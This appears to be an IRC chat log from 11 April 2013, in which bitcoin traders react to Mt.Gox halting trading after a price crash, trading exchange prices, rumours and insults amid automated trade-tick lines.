https://support.mtgox.com/entries/21519569-Market-Cooldown-for-12-hours Apr 11 18:10:15 thats rediculous Apr 11 18:10:21 Wow, thats so bad. Apr 11 18:10:37 "we have lots of money held in bitcoins, so we dont want the price to go down anymore, so we're halting trading" Apr 11 18:10:50 i doubt thats it Apr 11 18:10:51 the worst is that they think it helps Apr 11 18:11:01 they dont care about price value Apr 11 18:11:08 if they think price is irrational they should buy up themselves Apr 11 18:11:13 isntead of holding trading Apr 11 18:11:16 Yeah, why would they need to Apr 11 18:11:24 The users bring the money and btc Apr 11 18:11:27 well, bigger price value == more money in exchange fees, same percentage, bigger cuts. Apr 11 18:11:32 They shouldnt have to carry much on hand Apr 11 18:11:36 topace|2 fractional reserve ftw. Apr 11 18:11:53 of course it has nothing to do with price, all to do with lack of techrastructure Apr 11 18:12:38 pigeons: of course Apr 11 18:12:44 heh Apr 11 18:13:22 someone should halt MagicalTux from talking Apr 11 18:13:25 https://bitcointalk.org/index.php?topic=173433.0 Apr 11 18:13:32 ;;title Apr 11 18:13:33 (title ) -- Returns the HTML ... of a URL. Apr 11 18:13:34 i think the problem is they simply made too much money to give a shit about anything Apr 11 18:13:37 ;;title https://bitcointalk.org/index.php?topic=173433.0 Apr 11 18:13:49 hilarious how people go DONT SELL Y OU ARE KILLING IT on the btce chat Apr 11 18:14:05 PSA: Bitcoin's survival and long term prospects depend on MtGox getting killed. Apr 11 18:14:08 if we all close our eyes maybe it wont happen! Apr 11 18:14:16 btc-e is great entertainment right now Apr 11 18:14:22 btc-e chat* Apr 11 18:14:26 that;s right gribble boy. Apr 11 18:15:12 59€ on BTC 24 Apr 11 18:15:39 it's crashing spectacularly on BTC-24 Apr 11 18:15:43 "pice of shit scamsite" Apr 11 18:15:44 hahah Apr 11 18:16:17 there hasn't been a buying opportunity like this in several days!! Apr 11 18:16:52 lol Apr 11 18:16:55 ever since last week!1 Apr 11 18:17:03 where's max? Apr 11 18:17:24 pigeons keiser ? he's crying like a leetal bitch. Apr 11 18:17:38 ? Apr 11 18:18:00 no worries, max keiser is going to save us Apr 11 18:18:02 gox shut down for 36 hours? Apr 11 18:18:20 at least that will stop the weekend dip, lol Apr 11 18:18:27 10 Hours Apr 11 18:18:32 people will just rush to other exchanges... Apr 11 18:18:38 you can still withdraw Apr 11 18:18:43 Bitstamp is currently trading at 79$ Apr 11 18:18:53 ChaangNoi: where are you seing this 36 h? Apr 11 18:18:57 79$ ! Apr 11 18:18:58 this is like open outcry ;) Apr 11 18:19:04 Trading is halted until 2013-04-12 02:00am UTC to allow the market to cooldown following the drop in price. Read more details on the support. Additionally trading fees will not be charged within 48 hours of trading resuming (until 2013-04-14 02:00am UTC). Apr 11 18:19:04 i might have failed at maths Apr 11 18:19:08 you can still withdraw <<< you can still withdraw YET Apr 11 18:19:14 once they run out of reserves what happens ? Apr 11 18:19:23 LTC 1.5$ hahaha Apr 11 18:19:44 why you think they run fractional reserve tho? Apr 11 18:20:21 [MPEX] [S.MPOE] 12586 @ 0.00070215 = 8.8373 BTC [+] Apr 11 18:20:22 because they ran in the red for very very long. Apr 11 18:20:43 $79.. that is some panic selling i guess Apr 11 18:20:45 [MPEX] [S.MPOE] 4019 @ 0.00070306 = 2.8256 BTC [+] Apr 11 18:20:59 [MPEX] [S.MPOE] 7187 @ 0.00071567 = 5.1435 BTC [+] Apr 11 18:21:07 there was $70 on bitstamp for a moment yesterday Apr 11 18:21:27 [MPEX] [S.MPOE] 8600 @ 0.00071589 = 6.1567 BTC [+] Apr 11 18:21:31 time for a rehash of http://trilema.com/2013/in-which-noobs-learn-lessons-and-pay-for-the-privilege/ Apr 11 18:21:32 i guess. Apr 11 18:21:56 and Bitstamps down... Apr 11 18:22:01 chaotic... Apr 11 18:22:03 btc e 68 Apr 11 18:22:10 [MPEX] [O.USD.C095T] 40 @ 0.27621517 = 11.0486 BTC [-] Apr 11 18:22:42 dont think i can recommend bitfloor yet Apr 11 18:22:53 i love their fee structure, but they are too instable and small time Apr 11 18:24:09 think about this for one second: even if there were enough people wanting to buy at this low price, they wont even be able to because of the time it takes to wire money in to another exchange. However, those wanting to sell can get their BTC more easily to another exchange. So for the next 24h, it will be a sellers market on Apr 11 18:24:40 gesell pretty much Apr 11 18:24:53 You know mircea_popescu, I think the loss people may or may not get tells the lesson much better than calling people newbs. Apr 11 18:25:09 bid @ 43.09127 Apr 11 18:25:09 ask @ 53.00000 Apr 11 18:25:19 Doffx i think so too. Apr 11 18:25:21 € on BTC 24 WTFFFFFF Apr 11 18:25:24 [MPEX] [O.USD.C116T] 20 @ 0.18251672 = 3.6503 BTC [+] Apr 11 18:25:24 damn I wish funds left on btc-24 to buy Apr 11 18:25:26 tjos os ficled i[ Apr 11 18:25:31 !! Apr 11 18:25:48 Doffx: where's the fun in that though? Apr 11 18:26:03 [HAVELOCK] [VTX] 3 @ 0.3 = 0.9 BTC [+] Apr 11 18:26:03 so mt gox has suspended trading? Apr 11 18:26:03 [HAVELOCK] [VTX] 1 @ 0.3 BTC [+] Apr 11 18:26:04 [HAVELOCK] [VTX] 10 @ 0.3 = 3 BTC [+] Apr 11 18:26:05 [HAVELOCK] [VTX] 15 @ 0.3 = 4.5 BTC [+] Apr 11 18:26:06 [HAVELOCK] [VTX] 10 @ 0.3 = 3 BTC [+] Apr 11 18:26:07 [HAVELOCK] [VTX] 16 @ 0.31 = 4.96 BTC [+] Apr 11 18:26:08 [HAVELOCK] [VTX] 20 @ 0.31 = 6.2 BTC [+] Apr 11 18:26:09 I dont know, I dont find fun in telling people I told you so either. Apr 11 18:26:16 http://www.youtube.com/watch?v=fKzymtAVBqg Apr 11 18:26:16 mjr: yep Apr 11 18:26:19 Doffx somebody has to. Apr 11 18:26:20 til tom Apr 11 18:26:29 man... this is insane Apr 11 18:26:39 No, nobody has to. Apr 11 18:27:02 suprisingnly the volume on bitcoin-24 still seems level Apr 11 18:27:05 Doffx if everybody shuns this responsibility we just get us-style systemic failurer. Apr 11 18:27:13 "nobody has to tell americans they're lazy stupid and fat" Apr 11 18:27:15 Educating people, and building each other nets better results, but we never do that. Apr 11 18:27:23 just let them fritter away into nothingness and then starve. sure. Apr 11 18:27:38 mircea_popescu: So you've called folks out for having price too high and not selling. Is there a plan for the inverse? "Guys bitcoin should not be selling below $2, please stop selling." ;) Apr 11 18:27:41 Doffx THIS is education. education begins and ends with telling stupid people they are stupid Apr 11 18:27:47 and forcing them to interiorise this, AGAINST their will. Apr 11 18:27:49 that's education. Apr 11 18:28:17 this is healthy Apr 11 18:28:24 59 at btc-e Apr 11 18:28:28 Sigh.. you assume they are stupid, and not just caught up in some weird BTC euphoria, emotion trumps rational thought. Apr 11 18:28:30 but i have to take a break Apr 11 18:28:31 ciao Apr 11 18:28:34 Doffx that is stupid. Apr 11 18:28:43 the very definition of stupid. Apr 11 18:28:46 euphoria is the stupod Apr 11 18:28:58 shouldve been a warning sign Apr 11 18:29:00 bgupta heh. it will find its level. Apr 11 18:30:32 80 at bitfloor Apr 11 18:30:36 lol Apr 11 18:31:02 55 Apr 11 18:31:04 on btc-e Apr 11 18:31:42 ;;goxlag Apr 11 18:31:42 MtGox lag is 8.984516 seconds. During this time, light travels 0.0180048694683 AU. You could have sent a bitcoin one full loop along the orbit of the Moon around Earth (0.016 AU). Apr 11 18:31:47 it lags while doing nothing Apr 11 18:31:53 hey guys, ready for another crazy day on the markets? lol Apr 11 18:32:02 haha sure Apr 11 18:32:02 [HAVELOCK] [SDICE] 1 @ 0.27000101 BTC [-] Apr 11 18:32:03 [HAVELOCK] [SDICE] 2 @ 0.270001 = 0.54 BTC [-] Apr 11 18:32:20 good for S.dice ! Apr 11 18:32:40 They stopped the market! Apr 11 18:32:53 Now that is "Stupid" Apr 11 18:33:02 [HAVELOCK] [SDICE] 1 @ 0.27 BTC [-] Apr 11 18:33:04 [HAVELOCK] [SDICE] 1 @ 0.26013001 BTC [-] Apr 11 18:33:05 [HAVELOCK] [SDICE] 2 @ 0.26013 = 0.5203 BTC [-] Apr 11 18:33:06 [HAVELOCK] [SDICE] 1 @ 0.26011 BTC [-] Apr 11 18:34:11 evoorhees: i was reading about a backlog of satoshi dice payouts, what's that all about? Apr 11 18:34:20 *opening curtain, looking at sky first time since 10 days Apr 11 18:35:02 [HAVELOCK] [SDICE] 1 @ 0.26013001 BTC [+] Apr 11 18:35:03 [HAVELOCK] [SDICE] 2 @ 0.26011 = 0.5202 BTC [-] Apr 11 18:35:06 btc-e changed from user name to e-mail... i used some random e-mail and i dont know what it is, cant log in... fail... Apr 11 18:35:28 that's what happens lol Apr 11 18:36:02 [HAVELOCK] [SDICE] 1 @ 0.26013001 BTC [+] Apr 11 18:37:19 GEM from BTC-E chat: "schicksal: MtGox has been suspended by the local japanese authorities for the past 24 hours for inquiry into money laundering via BTC" Apr 11 18:37:21 pigeons - the site is hung up for an hour or so, that might be what you're refering to Apr 11 18:37:25 we're resetting here shortly Apr 11 18:37:36 (all bets will process as normal) Apr 11 18:37:42 thanks Apr 11 18:39:28 lippoper dont quote the troll box here, lol Apr 11 18:39:30 omg from btc e trollbox ? quick, SELL Apr 11 18:39:55 ChaangNoi, I forgot to put my ROFL after the quote Apr 11 18:40:15 :) Apr 11 18:40:34 but seriously FoxNews planned this? How do they have a story already out? http://www.foxnews.com/tech/2013/04/11/bitcoin-electronic-cash-beloved-by-hackers/ Apr 11 18:40:53 "Just days ago the total value of bitcoins in circulation hit $2 billion, up from a tiny fraction of that last year. But late Wednesday, Bitcoin crashed, shedding more than 60 percent of its value in the space of a few hours before recouping some of its losses. Critics say the roller coaster currency movements are just another sign that Bitcoin is a bubble waiting to burst." Apr 11 18:41:13 takes five minutes to type something into the box. Apr 11 18:41:29 "On Tuesday, the price of a single bitcoin had topped $200. On Wednesday, it hit $266 before a flash crash dragged it back down to just over $100. By Thursday, bitcoins were trading for around $150." Apr 11 18:41:31 I guess so Apr 11 18:43:17 "Some may wonder whether Caldwell's coins will one day be among the few physical reminders of an expensive fad that evaporated into the ether -- perhaps the result of a breakdown in its electronic architecture, or maybe after a crackdown by government regulators." Apr 11 18:44:15 so from 260 -> 150 -> 50 Apr 11 18:44:28 in the last 2 days Apr 11 18:44:40 you can skip the 150 Apr 11 18:46:14 usagi poking the dragon https://bitcointalk.org/index.php?topic=112876.msg1804012#msg1804012 Apr 11 18:46:22 tiberslav! Apr 11 18:46:28 What an EPIC bubble Apr 11 18:47:14 [BTCTC] [ASICMINER-PT] 1 @ 0.7443 BTC [-] Apr 11 18:47:17 [BTCTC] [ASICMINER-PT] 1 @ 0.7442 BTC [-] Apr 11 18:47:28 [BTCTC] [ASICMINER-PT] 1 @ 0.7441 BTC [-] Apr 11 18:47:31 [BTCTC] [ASICMINER-PT] 1 @ 0.744 BTC [-] Apr 11 18:47:33 when is 2am utc? Apr 11 18:47:34 [BTCTC] [ASICMINER-PT] 1 @ 0.7431 BTC [-] Apr 11 18:47:36 12 hours? Apr 11 18:47:37 [BTCTC] [ASICMINER-PT] 4 @ 0.74 = 2.96 BTC [-] Apr 11 18:47:39 [BTCTC] [ASICMINER-PT] 12 @ 0.74 = 8.88 BTC [-] Apr 11 18:47:42 [BTCTC] [ASICMINER-PT] 1 @ 0.7351 BTC [-] Apr 11 18:47:42 like 10 Apr 11 18:47:45 [BTCTC] [ASICMINER-PT] 5 @ 0.735 = 3.675 BTC [-] Apr 11 18:47:46 kk Apr 11 18:47:47 [BTCTC] [ASICMINER-PT] 1 @ 0.7301 BTC [-] Apr 11 18:47:50 [BTCTC] [ASICMINER-PT] 4 @ 0.73 = 2.92 BTC [-] Apr 11 18:47:52 right when i sleep crap Apr 11 18:47:54 [BTCTC] [ASICMINER-PT] 5 @ 0.729 = 3.645 BTC [-] Apr 11 18:47:59 [BTCTC] [ASICMINER-PT] 1 @ 0.729 BTC [-] Apr 11 18:48:04 [11:47] <+amphipod> Apr11 15:46:30 ripple 0.0001 @ 149.99482125 USD Apr 11 18:48:04 [BTCTC] [ASICMINER-PT] 5 @ 0.728 = 3.64 BTC [-] Apr 11 18:48:23 [BTCTC] [ASICMINER-PT] 5 @ 0.727 = 3.635 BTC [-] Apr 11 18:48:26 [BTCTC] [ASICMINER-PT] 6 @ 0.7261 = 4.3566 BTC [-] Apr 11 18:48:30 [BTCTC] [ASICMINER-PT] 1 @ 0.72602 BTC [-] Apr 11 18:48:33 [BTCTC] [ASICMINER-PT] 6 @ 0.725 = 4.35 BTC [-] Apr 11 18:49:28 [BTCTC] [RSM] 1 @ 0.00104 BTC [-] Apr 11 18:49:59 $avg Apr 11 18:50:01 deadweasel: 156.12 Apr 11 18:50:26 the worst thing is going to be reading all the "I told you so" posts all over the internet. Apr 11 18:50:48 ;;ticker Apr 11 18:50:49 BTCUSD ticker | Best bid: 120.00000, Best ask: 123.40098, Bid-ask spread: 3.40098, Last trade: 120.00000, 24 hour volume: 258375.90467927, 24 hour low: 105.00000, 24 hour high: 246.94000, 24 hour vwap: 161.16211 Apr 11 18:51:14 ColdHardMetal i got mine done early :p Apr 11 18:51:19 at least a got a good box of cigars out of this bubble:) Apr 11 18:51:40 lol Apr 11 18:51:43 mp: lol Apr 11 18:51:48 [BTCTC] [RSM] 14 @ 0.001033 = 0.0145 BTC [-] Apr 11 18:51:52 gox closing for 1 day is like a master stroke Apr 11 18:52:07 cash is stuck just long enough Apr 11 18:52:13 btc is freely movable Apr 11 18:52:17 already sold those coins Chaang, so we're both in good shape :) Apr 11 18:52:22 all that can happen is sell Apr 11 18:52:56 holy fuck - afk for 2 hours and this is what happens... Apr 11 18:53:30 pgp2: lol Apr 11 18:54:03 bitfloor not trading Apr 11 18:54:18 bitcoin-central still is (euro) Apr 11 18:54:31 pgp2 must stay glued to monityor nao Apr 11 18:54:34 good thing i have btc that just got there.... Apr 11 18:55:53 CHM i hoe you sold at $250 Apr 11 18:56:09 So curious.. all the sites that are helping to facilitate RL commerce using btx, seem to rely on exchange values to help set spot exchange rates.. How will these sites operate.. e.g - bitpay Apr 11 18:56:34 bgupta don't ask ;/ Apr 11 18:56:44 when i say mtgox is bitcoin's #1 enemy, i mean it. Apr 11 18:56:50 they've single handedly fucked up everything. Apr 11 18:56:53 Chaang: nah, nothing quite that high, but still well in the money. Apr 11 18:56:56 funny how btc-e a russian mob site is the large btc usd exchange in operation in the whole world... right now... Apr 11 18:56:57 again. Apr 11 18:57:11 ;;title https://bitcointalk.org/index.php?topic=173201.0 Apr 11 18:57:17 :c Apr 11 18:57:18 mtgox under Distributed Denial of Competence attack Apr 11 18:57:35 lol ^ Apr 11 18:58:22 lol Apr 11 18:58:38 Virtex dropped to 65 and now up to 100 again Apr 11 18:58:42 ;; goxlag Apr 11 18:58:43 MtGox lag is 10.913419 seconds. During this time, light travels 0.0218703694833 AU. You could have sent a bitcoin ten times between Earth and Moon (0.0257 AU). Apr 11 18:59:31 irc from a cell phone... not so great... Apr 11 19:00:13 [MPEX] [O.USD.P140T] 3 @ 0.08275503 = 0.2483 BTC [+] Apr 11 19:00:38 a drop from 265 to 105 is no sweat, but you go from 150 to 120 and its time to halt trading Apr 11 19:00:43 75K news users in 10 days, if you compare to 100K for ALL 2012, some ppl on MTgox shit some brick atm Apr 11 19:00:57 btce down now Apr 11 19:01:20 lol, everything is down Apr 11 19:01:26 we gave up on the exchanges Apr 11 19:01:29 yeah Apr 11 19:01:30 otc price is 120 Apr 11 19:01:33 what a joke Apr 11 19:01:36 that seems to be the real price Apr 11 19:01:37 if anyone is interested Apr 11 19:01:39 around 120 i think Apr 11 19:01:45 we seem to have agrred on that Apr 11 19:01:52 [BTCTC] [BASIC-MINING] 2 @ 0.39 = 0.78 BTC [+] Apr 11 19:02:08 jcpham way to go. Apr 11 19:02:21 i've been saying for a long time -otc shouldn't exactly base their trades off the ticker Apr 11 19:02:28 seems like a good excuse now Apr 11 19:02:29 we don't Apr 11 19:02:32 these exchanges are fucked Apr 11 19:02:36 anyway, deposits flushed. Apr 11 19:02:38 I keep seeing exchanges scroll by on -market I've never even heard of before. Apr 11 19:02:47 maybe we should meetup in regional public places and start some open outcry pit trading.. Apr 11 19:02:47 any fiat'll do apparently. Apr 11 19:03:03 the price is what sellers say it is Apr 11 19:03:08 BTC E up, F5F5F5F5F5F5F5F5F5 Apr 11 19:03:15 if the counterparty agrees to it, that's the price Apr 11 19:03:19 i think this will be a long hurtful downtrend Apr 11 19:03:22 gribble *can* base off gox, but majority of trades I do get agreed upon on trade-by-trade Apr 11 19:03:23 not a quick v dip Apr 11 19:03:41 the 2011 crash took almost two years to recover Apr 11 19:04:01 taub: things were a lot different in 2011 Apr 11 19:04:11 YES open outcry FTW Apr 11 19:04:29 eh, i think we will see gox finally go down Apr 11 19:04:34 and people get some good exchanges Apr 11 19:04:40 that actually are professional Apr 11 19:04:53 k Apr 11 19:04:54 lets hope so Apr 11 19:05:07 i want a 0% exchange that isn't exploitable >:D Apr 11 19:05:11 in the meanwhile MT is sweating and eating pizza while people panic Apr 11 19:05:14 :D Apr 11 19:05:30 i cannot believe that fucking they said "we are a victim of our own success, look at our impressive numbers" Apr 11 19:05:43 yes Apr 11 19:05:52 they have to put some japanese people into pr Apr 11 19:05:54 mircea_popescu: maybe you should do a post about his diet, https://twitter.com/MagicalTux/status/322317865443274752/photo/1 Apr 11 19:06:03 douche bags Apr 11 19:06:05 the MtGox orderbook is MELTING Apr 11 19:06:07 and be a bit humbler... how about a "we are very sorry" Apr 11 19:06:09 it's just funny Apr 11 19:06:10 they are halted Apr 11 19:06:18 what would their order book be good for? Apr 11 19:06:29 bitfloor back up? Apr 11 19:06:35 we are sorry for doing serious damage to an amazing community due to our incompetence Apr 11 19:06:48 [MPEX] [S.MPOE] 2500 @ 0.00069713 = 1.7428 BTC [-] Apr 11 19:06:50 [MPEX] [S.MPOE] 2000 @ 0.00069712 = 1.3942 BTC [-] Apr 11 19:06:50 that would be a nice start Apr 11 19:06:54 they're mostly damaging the speculators tho... Apr 11 19:06:58 true Apr 11 19:07:01 And I say good riddance Apr 11 19:07:05 https://twitter.com/MagicalTux/status/303178594283298817/photo/1 Apr 11 19:07:08 is he boasting? Apr 11 19:07:18 coinlab will replace gox sorta? Apr 11 19:07:19 joecool obviously makes a body smart. Apr 11 19:07:23 i agree...to some extent, but press is not gonna be good Apr 11 19:08:04 we are sorry for doing serious damage to an amazing community due to our incompetence <<< that. Apr 11 19:08:15 Namworld: is there an up to date gox orderbook? Apr 11 19:08:24 bitfinex is still up trading around 120 as well Apr 11 19:08:25 you gave us 1mn a month+ for the past coupla months, we fucked it all up. Apr 11 19:08:32 yes, clarkmoody and bitcoincharts Apr 11 19:08:35 they update Apr 11 19:08:42 lmao bitfinex still trading? Apr 11 19:08:44 82 on bitfloor Apr 11 19:08:46 it's only placing new orders that's suspended Apr 11 19:08:48 because mtgox is still quoting 120 Apr 11 19:09:15 99 on bitfloor i see Apr 11 19:09:24 taub taht'll be the amusement of the weekend, stuff like bitfinex Apr 11 19:10:10 FFFUUUUCCCCKKK Apr 11 19:10:14 My PUTS Apr 11 19:10:17 they sold! Apr 11 19:10:24 Trade with confidence on the world's largest Bitcoin exchange! Apr 11 19:10:35 ^^Really? Apr 11 19:10:42 bitfinex is not routing orders to gox, only internally, bid 110 ask 148 Apr 11 19:11:28 russia saves the day Apr 11 19:11:37 love the russians today Apr 11 19:12:13 have to appreciate mpex and people who use it Apr 11 19:12:19 no dumping of stocks Apr 11 19:12:22 prices steady Apr 11 19:12:27 and bitfinex will liquidate margin positions based on those spreads - lol Apr 11 19:12:40 fuck Apr 11 19:12:41 yeah people losing their shirts today Apr 11 19:12:44 fuckfuckfuck Apr 11 19:12:49 I want my puts back lol Apr 11 19:13:06 though i see it as 130/130 Apr 11 19:13:11 on BFX Apr 11 19:13:39 buy buy buy on bitfloor lol Apr 11 19:14:00 mjr_: wait for the actual bids and asks to load, don't just look at the suggestion Apr 11 19:14:09 i am looking directly at the order book Apr 11 19:14:31 bid 106 ask 148 Apr 11 19:14:32 122/122 Apr 11 19:14:38 btce back to 100 Apr 11 19:14:54 I doubt anyone was really set up for it, but some pretty sick arb spots today. Apr 11 19:14:54 or you can look directly at the trades Apr 11 19:15:09 public trades history- last: 122.1 Apr 11 19:15:34 ColdHardMetal: are you including MtGox's frozen book? Apr 11 19:15:44 i don't see a lot of arb if not…and if so it's illusory Apr 11 19:15:46 mjr_: my bad, i was reading them reverse order Apr 11 19:15:50 Namworld it srsly doesn't look like it;'s going to go down too badly. Apr 11 19:15:53 were your puts high ? Apr 11 19:15:59 spinkr: nope. Apr 11 19:16:46 oh i see what you mean, at certain points in the day…looks like there are some actors maybe doing it then Apr 11 19:18:00 134 Apr 11 19:18:10 well they sold for 0.25, decent Apr 11 19:18:29 But not if I can't get more and it keeps crashing... Apr 11 19:18:38 the MtGox mess might hurt BTC badly Apr 11 19:18:41 could be even better when taking synthetic rates into consideration. you'd need a lot of data at hand to make that work though. Apr 11 19:19:03 I think I could have gotten more for them tho... Apr 11 19:19:28 Either way I sold BTC at 250, sold some puts. So much BTC profit Apr 11 19:19:37 I can buyback BTC-BOND in full pretty much Apr 11 19:19:43 lol, its becoming a meme "victim of their own success" Apr 11 19:19:46 ... Apr 11 19:19:50 Without selling anything from my portfolio Apr 11 19:20:22 do you know who else was a victim of his own success ? Apr 11 19:20:23 hitler. Apr 11 19:20:28 hitler was a victim of his own success. Apr 11 19:20:44 also saddam hussein was a victim of his own success Apr 11 19:20:47 and that osama guy. Apr 11 19:20:51 do they not realize how easy it would have been to limit trades to 1 btc units? poof there goes prob OVER 90% of your volume, maybe you could handle that Apr 11 19:21:15 that is why most exchanges don't really allow odd lots for everyone Apr 11 19:21:30 thats what virwox did until the recent value increase, now they allow .1 increments Apr 11 19:21:46 well...it is super obvious Apr 11 19:21:59 i don't think they will get the chance to remedy their stupidity Apr 11 19:22:28 :) Apr 11 19:23:54 [MPEX] [S.DICE] 13510 @ 0.0027 = 36.477 BTC [-] Apr 11 19:24:20 I think earnings... people had lots of calls before the crash I think Apr 11 19:25:18 if they weren't exercised Apr 11 19:25:53 227 was last vwap... so any that don't break even there would be profit for mpe Apr 11 19:25:56 x Apr 11 19:30:03 Sick, 6.5K sold just before MtGox close "hey dude, we gonna switch off for 12h, sold buddy !" Apr 11 19:30:05 http://bitcoincharts.com/charts/btceUSD#rg2zig30-minztgSza1gEMAzm1g10za2gEMAzm2g21zv Apr 11 19:30:42 [MPEX] [S.DICE] 425 @ 0.0029486 = 1.2532 BTC [+] Apr 11 19:31:51 error4733 nasty. Apr 11 19:32:23 https://bitcointalk.org/index.php?topic=173512.0 lol Apr 11 19:32:48 With my gains, I think I should repay my debt Apr 11 19:33:05 and put some aside for longterm... Apr 11 19:33:13 I got plenty left to trade too Apr 11 19:33:40 I think some BTC-BOND holders might be sad tho... they liked my bond... Apr 11 19:34:27 mt gox is really not going to trade for the next 9.5 hours... am I reading that right? Apr 11 19:34:38 ;;ticker Apr 11 19:34:39 BTCUSD ticker | Best bid: 120.00000, Best ask: 123.40098, Bid-ask spread: 3.40098, Last trade: 120.00000, 24 hour volume: 253681.25852100, 24 hour low: 105.00000, 24 hour high: 236.61711, 24 hour vwap: 159.80297 Apr 11 19:34:44 pgp, yes Apr 11 19:34:45 pgp: that's the word on the street Apr 11 19:34:46 pgp yes Apr 11 19:34:58 ;;asks 170 Apr 11 19:35:00 There are currently 6396.6254 bitcoins offered at or under 170.0 USD, worth 963814.770931 USD in total. | Data vintage: 0.0024 seconds Apr 11 19:35:03 does any other exchange do that? Apr 11 19:35:07 no. Apr 11 19:35:14 ;;bids 100 Apr 11 19:35:14 There are currently 9319.4263 bitcoins demanded at or over 100.0 USD, worth 999793.039756 USD in total. | Data vintage: 13.8258 seconds Apr 11 19:35:32 beyond the pale... Apr 11 19:35:38 ;;bids 0 Apr 11 19:35:38 There are currently 92501115 bitcoins demanded at or over 0.0 USD, worth 6073925.62664 USD in total. | Data vintage: 38.0100 seconds Apr 11 19:35:48 the bids orderbook is melting while people are waiting to be able to sell... Apr 11 19:35:57 This is going to get ugly... Apr 11 19:35:59 ;;goxlag Apr 11 19:35:59 MtGox lag is 6.568517 seconds. During this time, light travels 0.0131632345232 AU. You could have sent a bitcoin from Jupiter to its second largest moon, Callisto (0.012567 AU). Apr 11 19:36:03 bids orderbook? Apr 11 19:36:06 Major lag when gox comes back Apr 11 19:36:07 otc? Apr 11 19:36:13 Gox is down? Apr 11 19:36:13 oh Apr 11 19:36:16 no, the bids orderbook on Gox Apr 11 19:36:41 is gox processing BTC withdrawls? Apr 11 19:36:57 while supplies last. Apr 11 19:37:10 yeah…moved my funds off yesterday when they got all dicey with the order lag. can't be having that Apr 11 19:37:23 !ticker m ^oix Apr 11 19:37:24 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 123.90251552 / 218.88143499 / 226.22012381 (14550 shares, 2,478.62 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 11 19:37:26 i'm on the hook for about $10 if they evaporate Apr 11 19:37:31 =D Apr 11 19:37:34 Lol Apr 11 19:37:40 Me too Apr 11 19:37:45 down to "cool the market" funny they didn't do that on the way up. :) Also they claim they will be upgrading to a larger server. (A larger server!! Wow!! Perhaps we can get them a mainframe, because distributed computing hasn't been invented yet.) Apr 11 19:37:57 "servers" Apr 11 19:37:58 lol Apr 11 19:38:02 Hahahanaha Apr 11 19:38:06 Looks like mi Apr 11 19:38:18 POPCORN time ! Apr 11 19:38:26 coming soon, MtSplnkr from my home server Apr 11 19:38:28 bgupta: dude, it's probably like a whole 4U server too Apr 11 19:38:28 mircea_popescu is gox finally getting their shit together? Apr 11 19:38:32 commodore 64 to and apple IIe Apr 11 19:38:39 ;;bc,24hprc Apr 11 19:38:40 152.87 Apr 11 19:38:41 thepuller nope Apr 11 19:38:57 Waah the bitcoin world is ending Apr 11 19:38:58 Lol Apr 11 19:39:03 the said they were upgrading to a 128GB RAM machine.. that's a 2U server Apr 11 19:39:06 mtgox;d better be ending,. Apr 11 19:39:11 Apr11 16:38:39 mtgox 4.0000 @ 123.40098 USD Apr 11 19:39:12 what Apr 11 19:39:16 a lot has changed since "July 2011" Apr 11 19:39:18 Might even be able to get a 1U server with 128GB Apr 11 19:39:26 you can, I was kidding Apr 11 19:39:36 splnkr yea, for some values of a lot that are nothing at all. Apr 11 19:39:41 there was a gox trade just now Apr 11 19:39:55 unless amphipod is trolling Apr 11 19:39:56 ok, who wants to buy some puts and at what price? Apr 11 19:40:03 [HAVELOCK] [HIM] 2 @ 1.54 = 3.08 BTC [+] Apr 11 19:41:51 scrat that trade shows on mtgox.com too Apr 11 19:42:11 ThickAsThieves so then not quite as down as all that ? Apr 11 19:42:44 lol "we're going offline for 12 hours, wait i mean 1.2 hours" Apr 11 19:42:58 those decimals can be sneaky Apr 11 19:43:10 it was the only trade Apr 11 19:43:18 maybe they rebooted and one snuck in Apr 11 19:43:27 i wonder whats going on at that office right now Apr 11 19:44:00 mjr_: https://twitter.com/MagicalTux/status/322317865443274752/photo/1 Apr 11 19:44:01 mjr_: pride Apr 11 19:44:10 MtGox is like a box of chocolates, you never know what you're gonna get Apr 11 19:44:24 hahahaha Apr 11 19:44:59 ya, except they're monty pythion chocolates Apr 11 19:45:02 fried bug praline Apr 11 19:45:05 in other news, MtGox USD Coupon codes are no longer a thing Apr 11 19:45:15 "deprecated" today! Apr 11 19:45:18 that was announced a while ago, right? Apr 11 19:45:21 yep Apr 11 19:45:26 at least we know there's a good chance he'll die painfully from a hear attack Apr 11 19:45:29 that smacks of fractional reserve Apr 11 19:45:37 heart* Apr 11 19:45:58 mjr_ it does./ Apr 11 19:46:27 ugh...i almost wouldn't mind the illiquidity if they would just go away Apr 11 19:47:18 what would the ideal exchange situation be like? right now it's like we have regional and fragmented and scattered ones Apr 11 19:47:31 we can see the weaknesses of centralization at this point i'd say.... Apr 11 19:47:41 but there needs to be some critical mass for there to be volume Apr 11 19:48:28 since lag is such an issue, regional exchanges make some sense Apr 11 19:49:55 maybe ripple isnt so crazy Apr 11 19:50:19 this Apr 11 19:51:03 [BTCTC] [ASICMINER-PT] 2 @ 0.73 = 1.46 BTC [+] Apr 11 19:52:09 well ripple is cool for what it is, but it isn't "digital cash" in the same way bitcoin is either Apr 11 19:52:38 hmmm...irrational exuberance, and then irrational panic Apr 11 19:52:48 no yet, but the all idea behind is nice Apr 11 19:52:59 from what i can see...not one thing has materially changed about bitcoin in the last few days... Apr 11 19:53:10 hahaha like that ever matters Apr 11 19:53:13 not even a hack this time... Apr 11 19:53:18 if's for the bills and janes of the world that all owe each other small sums…in other words personas they used to design the service that don't really exist =P Apr 11 19:53:32 s/if's/it's Apr 11 19:53:40 though think of it..."we crashed the market back in 2011, and we did it again in 2013, care to trade?" Apr 11 19:55:19 but yeah the Ripple apporach maybe could work to make better exchange algorithms Apr 11 19:55:32 the old ripple concept Apr 11 19:55:34 not ripple.com Apr 11 19:55:43 centrally issued currency no thanks Apr 11 19:57:01 mircea_popescu i have just now stumbled on your twitter Apr 11 19:57:08 i am laughing loudly Apr 11 19:57:18 hehe Apr 11 19:57:28 http://www.theverge.com/2013/4/11/4209650/why-would-anyone-want-to-kill-shane-todd Apr 11 20:01:38 So how much fiat would it take for a professional organization (think corp/gov) to develop an inexpensive mining ASIC, mass produce it, and run enough to get 51%? (Guessing the biggest issue would be time.) And what real defense does our network have against such an attack? Apr 11 20:03:09 guessing the design and prototype could certainly be developed for < $500,000. Apr 11 20:03:24 a few problems Apr 11 20:03:33 which arm of gov would do that? Apr 11 20:03:44 and how do they get approval for that kind of spending? Apr 11 20:03:48 then Apr 11 20:03:51 if they do Apr 11 20:03:53 to what end? Apr 11 20:03:55 Lol, they need approval? 